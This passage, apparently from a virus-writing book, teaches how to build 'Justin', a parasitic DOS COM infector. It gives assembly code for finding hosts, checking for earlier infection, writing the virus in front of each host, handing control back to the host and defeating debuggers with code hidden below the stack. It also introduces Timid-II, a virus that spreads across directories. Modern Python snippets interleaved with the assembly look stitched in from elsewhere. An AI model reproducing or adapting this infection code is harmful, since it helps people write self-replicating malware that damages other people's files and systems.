There are two different methods of writing a parasitic COM infector. One approach is to put the virus at the beginning of the host, and the other is to put the virus at the end of the host. Each strategy has its advantages and its difficulties, so we'll discuss both. This chapter will detail the first approach: a virus that places itself at the beginning of the host.
At the same time, we're going to begin a discussion of what is necessary to write a virus that doesn't cause problems. We've already seen that some viruses - like overwriting viruses - are inherently destructive. For these viruses, the very act of infecting a program ruins it. Parasitic viruses need not be destructive, but they can be if the programmer isn't careful. Unlike companion viruses, which rely heavily on DOS to take care of the details of executing the host, a parasitic virus has to be careful not to mistreat the host program if it's going to work properly when the virus gives it control.
Often virus authors aren't careful about the details which must be covered if a virus is to avoid causing inadvertent damage. Thus, they write "benign" viruses which may not be so benign. Such programming mistakes are often a good way to notice a virus before it wants to be noticed, simply because the problems are a clue to viral activity - if you're aware of what the problems are.
This chapter's virus is a parasitic virus which inserts itself at the beginning of a COM program file. Its name is Justin. Like CSpawn, Justin infects only COM files in the current directory. As such, it is fairly safe to experiment with.
Figure 5.1 depicts the action of Justin on a disk file. Essentially, the virus just moves the host program up and puts itself in front of it. This is accomplished fairly easily with DOS, using the file read and write functions. Before the virus does that, however, it must perform a few checks to make sure it won't louse things up when infecting a program.
Fig. 5.1: Action of JUSTIN on a COM file.
First and most important, Justin must have enough memory to execute properly. It will read the entire host into memory and then write it back out to the same file at a different offset. In general, a COM program can be almost 64 kilobytes long (not quite), so a buffer of 64K must be available in the computer's memory. If it is not, the virus cannot operate, and it should simply go to sleep. Justin contains a routine CHECK_MEM which makes this determination. If enough memory is available, CHECK_MEM returns with the carry flag reset and es set up with the segment of a 64K block of memory it can use. If there is not enough memory, CHECK_MEM returns with carry set. The main control routine of the virus looks like this:
JUSTIN:
call CHECK_MEM ;enough memory?
jc GOTO_HOST_LOW ;nope, pass ctrl to host
call JUMP_HIGH ;jump to high memory segment
call FIND_FILE ;else find a host
jc GOTO_HOST_HIGH ;none, pass ctrl to host
call INFECT_FILE ;yes, infect it
GOTO_HOST_HIGH: ;jmp to host from new mem blk
GOTO_HOST_LOW: ;jmp to host from orig mem blk
so you can see that if there isn't enough memory for the virus to operate, it does nothing but let the host execute normally.
Now, typically, when a COM program is loaded it is given all available system memory. Thus, any memory above the PSP that belongs to DOS will be available for the virus to use. The virus must, however, keep its hands off the entire 64 kilobyte block which starts with the PSP. The virus itself lives at offset 100H in this segment and is followed directly by the host it was originally attached to. Then at the very end of this segment is the COM program's stack. If the virus messes with any of these things it could cause problems. So what the virus wants to do is use the 64 kilobyte block just above where it lives - if that block is available to use.
There are a number of things which could cause this block of memory to be unavailable. For example, there may not be much memory in the computer. If it only has 256 kilobytes installed, that memory just may not exist. Likewise, most of the memory may be in use. For example, if you're using a communications program that allows you to shell to DOS during a data transfer, there may not be a whole lot of DOS memory available, even if you do have 640K of conventional memory.
One could simply physically check memory to avoid these problems - write a byte to the desired location and see if it's there when you read it back. This, however, neglects a more subtle problem. There could be something running just below the 640K limit. For example, the beneficial virus KOH (discussed later in this book) operates at the very top of conventional memory. Overwrite it and your computer will grind to a halt. For this reason, there is only one sensible way to check whether enough memory is available: use DOS' own memory management functions.
One can modify the amount of memory allocated to a program with DOS Interrupt 21H, Function 4AH. One simply puts the desired number of paragraphs of memory (16 byte blocks) in bx and calls this function. If unsuccessful, DOS will set the carry flag and put the number of blocks actually available in bx. Since we need 2*64K bytes of memory, we simply attempt to allocate memory:
mov ah,4AH
mov bx,2000H ;2000H*16 = 2*64K
int 21H
If this function returns successfully, enough memory is available. If not, there's not enough memory. Of course, if this function is successful, we've deallocated memory, and the host program may not like that. It may be expecting to have free rein over all the memory available. Thus, Justin must re-allocate all available memory if it's to be a nice virus. But how much is available? We still don't know. To find out, we just attempt to allocate too much - say a full megabyte (bx=0FFFFH). That's guaranteed to fail, but it will also return the amount available in bx. Then we just call Function 4AH again with the proper value. So the CHECK_MEM routine looks like this:
CHECK_MEM:
mov ah,4AH ;modify allocated memory
mov bx,2000H ;we want 2*64K
int 21H ;set c if not enough memory
pushf
mov ah,4AH ;re-allocate all available mem
mov bx,0FFFFH
int 21H
mov ah,4AH ;bx now has actual amt avail
int 21H
popf
ret ;and return to caller
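The paragraph counts used with Function 4AH are easy to check with a little arithmetic. The Python sketch below is only a calculator for the numbers quoted in this section; the function names are hypothetical.

```python
PARAGRAPH = 16  # one DOS paragraph is 16 bytes


def paragraphs_to_bytes(paragraphs):
    """Size in bytes of a block given in paragraphs."""
    return paragraphs * PARAGRAPH


def bytes_to_paragraphs(size):
    """Whole paragraphs needed to hold size bytes, rounded up."""
    return (size + PARAGRAPH - 1) // PARAGRAPH
```

So 2000H paragraphs is exactly 128K, and a request for 0FFFFH paragraphs asks for 16 bytes less than a full megabyte, which is more than conventional memory can supply.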
Now, if enough memory is available, Justin springs into action. The first thing it does is jump to the high block of memory 64K above where it starts executing. This is accomplished by the routine JUMP_HIGH. First, JUMP_HIGH puts a copy of the virus in this new segment. To do that, it uses the instruction rep movsb, which moves cx bytes from ds:si to es:di. In memory, the virus starts at ds:100H right now, and its length is given by OFFSET HOST - 100H, where OFFSET HOST is the address where the host program starts, a byte after the end of the virus. Thus, moving the virus up is accomplished by
mov si,100H
mov di,OFFSET HOST
mov cx,OFFSET HOST - 100H
rep movsb
Next, Justin moves the Disk Transfer Area up to this new segment at offset 80H using DOS Function 1AH. That preserves the command line, as discussed in the last chapter. Finally, JUMP_HIGH passes control to the copy of Justin in the high segment. (See Figure 5.2) To do this, it gets the offset of the return address for JUMP_HIGH off the stack. When JUMP_HIGH was called by the main control routine, the call instruction put the address right after it on the stack (in this case, the value 108H).
When a normal near return is executed, this address is popped off the stack into the instruction pointer register ip which tells what instruction to execute next. To get to the high segment, we capture the return offset by popping it off the stack, then we put the high segment on the stack, and then put the offset back. Finally, JUMP_HIGH returns using a far return instruction, retf. That loads cs:ip with the 4-byte address on the stack, transferring control to a new segment - in our case the high segment where the copy of Justin is sitting, waiting to execute.
Fig. 5.2: Jumping to the high segment
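The relationship between the two segments follows from real-mode address arithmetic, shown here as a small Python sketch. It assumes that the "high segment" is simply the current segment plus 1000H paragraphs, which is what "64K above" works out to; the segment value 2000H in the usage note is an arbitrary example and the function names are hypothetical.

```python
def linear_address(segment, offset):
    """20-bit physical address of segment:offset in real mode."""
    return ((segment << 4) + offset) & 0xFFFFF


def segment_above(segment, size_bytes=0x10000):
    """Segment value that starts size_bytes above the given segment."""
    return (segment + size_bytes // 16) & 0xFFFF
```

For example, if the code runs in segment 2000H, the same offset 108H in segment 3000H lies exactly 10000H bytes higher in memory, so a far return to 3000:0108 lands on the same instruction in the copied image.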
Once operating in the high segment, Justin can start the infection process. The file search routine is very similar to the routine used in the viruses we've already discussed. It uses the DOS Search First/Search Next functions to locate files with an extent "COM". This search routine differs in that it calls another routine, FILE_OK, internally (see Figure 5.3). FILE_OK is designed to avoid problems endemic to parasitic viruses. The biggest problem is how to avoid multiple infection.
As you will recall, the MINI-44 virus was very rude and overwrote every COM file it found. Multiple infections didn't matter because a file overwritten once by the virus looks exactly the same as one overwritten ten times. The CSpawn virus avoided multiple infections by hiding the companion COM file. A parasitic virus has a more difficult job, though. If it infects a COM file again and again, the file will grow larger and larger. If it gets too big, it will no longer work. Yet how does the parasitic virus know it has already infected a file?
Fig. 5.3: JUSTIN's file search and infect.
FILE_OK takes care of the details of determining whether a potential host should be infected or not. First, FILE_OK opens the file passed to it by FIND_FILE and determines its length. If the file is too big, adding the virus to it could make it crash, so Justin avoids such big files. But how big is too big? Too big is when Justin can't get into the high memory segment without ploughing the stack into the top of the host. Although Justin doesn't use too much stack, one must remember that hardware interrupts can use the stack at any time. Thus, about 100H bytes for a stack will be needed. So, we want
(Size of Justin) + (Size of Host) + (Size of PSP) < 0FF00H
to be safe. To determine this, FILE_OK opens the potential host using DOS function 3DH, attempting to open in read/write mode. We already met this function with MINI-44. Now we just use it in read/write mode:
mov dx,9EH ;address of file name in DTA
mov ax,3D02H ;open read/write mode
int 21H
If this open fails, then the file is probably read only, and Justin avoids it.
Next FILE_OK must find out how big the file is. One can pull this directly from the DTA, at offset 1AH. However, there is another way to find out how big a file is, even when you're not using the DOS search functions, and that is what Justin uses here. This method introduces an important concept: the file pointer.
FILE_OK moves the file pointer to the end of the file to find out how big it is. The file pointer is a four byte integer stored internally by DOS which keeps track of where DOS will read and write from in the file. This file pointer starts out pointing to the first byte in a newly-opened file, and it is automatically advanced by DOS as the file is read from or written to.
DOS Function 42H is used to move the file pointer to any desired value. In calling function 42H, the register bx must be set up with the file handle number, and cx:dx must contain a 32 bit long integer telling where to move the file pointer to. There are three different ways this function can be used, as specified by the contents of the al register. If al=0, the file pointer is set relative to the beginning of the file. If al=1, it is incremented relative to the current location, and if al=2, cx:dx is used as the offset from the end of the file. When Function 42H returns, it also reports the current value of the file pointer (relative to the beginning of the file) in the dx:ax register pair. So to find the size of a file, one sets the file pointer to the end of the file
mov ax,4202H ;seek relative to end
xor cx,cx ;cx:dx=0
xor dx,dx ;the offset from the end
int 21H
and the value returned in dx:ax will be the file size! FILE_OK must check this number to make sure it's not too big. If dx is not zero, the file is at least 64K long, and therefore too big:
or dx,dx ;is dx = 0?
jnz FOK_EXIT_C ;no, exit with c set
Likewise, if we add OFFSET HOST to ax, and it's greater than 0FF00H, the file is too big:
add ax,OFFSET HOST ;add size of virus + PSP
cmp ax,0FF00H ;is it too big?
ja FOK_EXIT_C ;yes, exit with c set
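The seek-to-end technique and the two size tests can be mirrored in Python, where `seek(0, os.SEEK_END)` plays the role of Function 42H with al=2 and cx:dx=0. This is a sketch of the arithmetic only: it uses ordinary Python integers, so no 16-bit wraparound is modelled, and the value 300H passed as `offset_host` in the demonstration is a made-up figure, not the real value of OFFSET HOST.

```python
import io
import os

SIZE_LIMIT = 0xFF00  # leaves about 100H bytes at the top of the segment for a stack


def file_size_by_seek(handle):
    """Seek to the end of the file and return the position as (dx, ax)."""
    position = handle.seek(0, os.SEEK_END)
    return position >> 16, position & 0xFFFF


def fits_in_segment(dx, ax, offset_host):
    """Apply the two tests from the text to a size given as dx:ax."""
    if dx != 0:                            # 64K or more: too big
        return False
    return ax + offset_host <= SIZE_LIMIT  # "ja" rejects anything above 0FF00H


# Demonstration on an in-memory file of 1000 bytes.
demo = io.BytesIO(bytes(1000))
dx, ax = file_size_by_seek(demo)
print(dx, ax, fits_in_segment(dx, ax, offset_host=0x300))
```

The other two seek modes correspond to `os.SEEK_SET` (al=0) and `os.SEEK_CUR` (al=1).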
If FILE_OK gets this far, the new host isn't too big, so the next step is to read the entire file into memory to examine its contents. It is loaded right after the virus in the high segment. That way, if the file is good to infect, the virus will have just created an image of the infected program in memory (see Fig. 5.4). Actually infecting it will be very simple. All Justin will have to do is write that image back to disk!
Fig. 5.4: JUSTIN creates an image of infected host.
To read the file into memory, we must first move the file pointer back to the beginning of the file with DOS Function 42H, Subfunction 0,
mov ax,4200H ;move file ptr
xor cx,cx ;0:0 relative from start
xor dx,dx
int 21H
Next, DOS Function 3FH reads the file into memory. To read a file, one must set bx equal to the file handle number and cx to the number of bytes to read from the file. Also ds:dx must be set to the location in memory where the data read from the file should be stored (the label HOST).
pop cx ;cx contains host size
push cx ;save it for later use
mov ah,3FH ;prepare to read file
mov dx,OFFSET HOST ;into host location
int 21H ;do it
Before infecting the new host, Justin performs two more checks in the FILE_OK routine. The first is simply to see if the potential host has already been infected. To do that, FILE_OK simply compares the first 20 bytes of the host with its own first 20 bytes. If they are the same, the file is already infected. This check is as simple as
mov si,100H
mov di,OFFSET HOST
mov cx,10
repz cmpsw
If the z flag is set at the end of executing this, then the virus is already there.
One final check is necessary. Starting with DOS 6.0, a COM program may not really be a COM program. DOS checks the program to see if it has a valid EXE header, even if it is named "COM", and if it has an EXE header, DOS loads it as an EXE file. This unusual circumstance can cause problems if a parasitic virus doesn't recognize the same files as EXE's and steer clear of them. If a parasitic COM infector attacked a file with an EXE structure, DOS would no longer recognize it as an EXE program, so DOS would load it as a COM program. The virus would execute properly, but then it would attempt to transfer control to an EXE header (which is just a data structure) rather than a valid binary program. That would probably result in a system hang.
One might think programs with this bizarre quirk are fairly rare, and not worth the trouble to steer clear of them. Such is not the case. Some COMMAND.COMs take this form - one file a nice virus certainly doesn't want to trash.
Checking for EXE's is really quite simple. One need only see if the first two bytes are "MZ". If they are, it's probably an EXE, so the virus should stay away! FILE_OK just checks
cmp WORD PTR [HOST],'ZM'
and exits with c set if this instruction sets the z flag. Finally, FILE_OK will close the file if it isn't a good one to infect, and leave it open, with the handle in bx, if it can be infected. It's left open so the infected version can easily be written back to the file.
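Readers are sometimes puzzled that the comparison is written with 'ZM' when the file starts with "MZ". The Python sketch below shows why: a 16-bit word is stored low byte first, so the two bytes "M", "Z" on disk read back as the word 5A4DH, which an assembler writes as the character constant 'ZM'. The function names are hypothetical.

```python
def is_exe_image(data):
    """True if the image starts with the 'MZ' signature of an EXE header."""
    return data[:2] == b"MZ"


def as_word(two_bytes):
    """Value of two consecutive bytes when read as a little-endian word."""
    return int.from_bytes(two_bytes, "little")
```

The same two-byte test is a cheap way for any tool to tell an EXE-format file apart from a true COM image, regardless of the file's extension.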
Now, if FIND_FILE has located a file to infect, the actual process of infecting is simple. The image of the infected file is already in memory, so Justin simply has to write it back to disk. To do that, Justin resets the file pointer to the start of the file again, and uses DOS Function 40H to write the infected host to the file. The size of the host is passed to INFECT_FILE from FILE_OK in dx, and bx still contains the file handle. To the host size, INFECT_FILE adds the size of the virus, OFFSET HOST - 100H, and writes from offset 100H in the high segment,
pop cx ;original host size to cx
add cx,OFFSET HOST - 100H ;add virus size to it
mov dx,100H ;start of infected image
mov ah,40H ;write file
int 21H
Close the file and the infection is complete.
The last thing Justin has to do is execute the original host program to which the virus was attached. The new host which was just infected is stored in the high segment, where the virus is now executing. The original host is stored in the lower segment. In order for the original host to execute properly, it must be moved down from OFFSET HOST to 100H, where it would have been loaded had it been loaded by DOS in an uninfected state. Since Justin doesn't know how big the original host was, it must move everything from OFFSET HOST to the bottom of the stack down (Fig. 5.5). That will take care of any size host. Justin must be careful not to move anything on the stack itself, or it could wipe out the stack and cause a system crash. Finally, Justin transfers control to the host using a far return. The code to do all of this is given by:
mov di,100H ;move host to low memory
mov si,OFFSET HOST
mov ax,ss ;ss points to low seg still
mov ds,ax ;set ds and es to point there
mov es,ax
push ax ;push return address
push di ;to execute host (for later)
mov cx,sp
sub cx,OFFSET HOST ;cx = bytes to move
rep movsb ;move host to offset 100H
retf ;and go execute it
There! The host gets control and executes as if nothing were different.
Fig. 5.5: Moving the host back in place.
One special case that Justin also must pay attention to is when there isn't enough memory to create a high segment. In this case, it must move the host to offset 100H without executing in a new segment. This presents a problem, because when Justin moves the host, it must overwrite itself (including any code in its body that is doing the moving).
To complete a move, and transfer control to the host, Justin must dynamically put some code somewhere that won't be overwritten. The only two safe places are (1) the PSP, and (2) on the stack. Justin opts for the latter. Using the code:
mov ax,00C3H ;put "ret" on stack
push ax
mov ax,0A4F3H ;put "rep movsb" on stack
push ax
Justin dynamically sets up some instructions just below the stack. These instructions are simply:
rep movsb ;move the host
ret ;and execute host
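The two constants decode to these instructions because of byte order, which the following Python sketch makes explicit. It models only how pushed words end up in memory: each push stores its word low byte first, at a lower address than the previous push. The function name is hypothetical.

```python
import struct


def pushed_bytes(*words):
    """Bytes left in memory, lowest address first, after pushing words in order."""
    memory = b""
    for word in words:
        # Each push lands just below the previous one, low byte first.
        memory = struct.pack("<H", word) + memory
    return memory
```

Pushing 00C3H and then 0A4F3H leaves the bytes F3 A4 C3 00 in ascending order: F3 A4 is rep movsb, C3 is a near ret, and the final 00 is padding that is never executed.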
Then Justin moves the stack up just above these instructions:
add sp,4
Here, we find two words on the stack:
[0100H]
[FFF8H]
The first is the address 100H, used to return from the subroutine just placed on the stack to offset 100H, where the host will be. The next is the address of the routine hiding just under the stack. Justin will return to it, let it execute, and in turn, return to the host. (See Figure 5.6)
Granted, this is a pretty tricky way to go about moving the host. This kind of gymnastics is necessary though. And it has an added benefit: the code hiding just below the stack will act as an anti-debugging measure. Notice how Justin turns interrupts off with the cli instruction just before returning to this subroutine to move the host? If any interrupt occurs while executing that code, the stack will wipe the code out and the whole thing will crash. Well, guess what stepping through this code with a debugger will do? Yep, it generates interrupts and wipes out this code. Try it and you'll see what I mean.
Fig. 5.6: Stack Detail for Move.
00FC: rep movsb
00FE: jmp 100H
0100: (HOST will be here)
In the virus you set up the si, di and cx registers, and jump from the main body of the virus to offset 00FCH, and the host will execute. Try this. Why do you need the jump instruction on 386 and above processors, but not on 8088-based machines?
The Justin virus in the last chapter illustrates many of the basic techniques used by a parasitic virus to infect COM files. It is a simple yet effective virus. As we mentioned in the last chapter, however, there is another important type of non-resident parasitic virus worth looking at: one which places itself at the end of a host program. Many viruses are of this type, and it can have advantages in certain situations. For example, on computers with slow disks, or when infecting files on floppy disks, viruses which put themselves at the start of a program can be very slow because they must read the entire host program in from disk and write it back out again. Viruses which reside at the end of a file only have to write their own code to disk, so they can work much faster. Likewise, because such viruses don't need a large buffer to load the host, they can operate in less memory. Although memory requirements aren't a problem in most computers, memory becomes a much more important factor when dealing with memory resident viruses. A virus which takes up a huge chunk of memory when going resident will be quickly noticed.
Timid-II is a virus modeled after the Timid virus first discussed in The Little Black Book of Computer Viruses. Timid-II is more aggressive than Justin, in that it will not remain in the current directory. If it doesn't find a file to infect in the current directory, it will search other directories for files to infect as well.
In case you read that last sentence too quickly, let me repeat it for you: This virus can jump directories. It can get away from you. So be careful if you experiment with it!
Non-destructive viruses which infect COM files generally must execute before the ho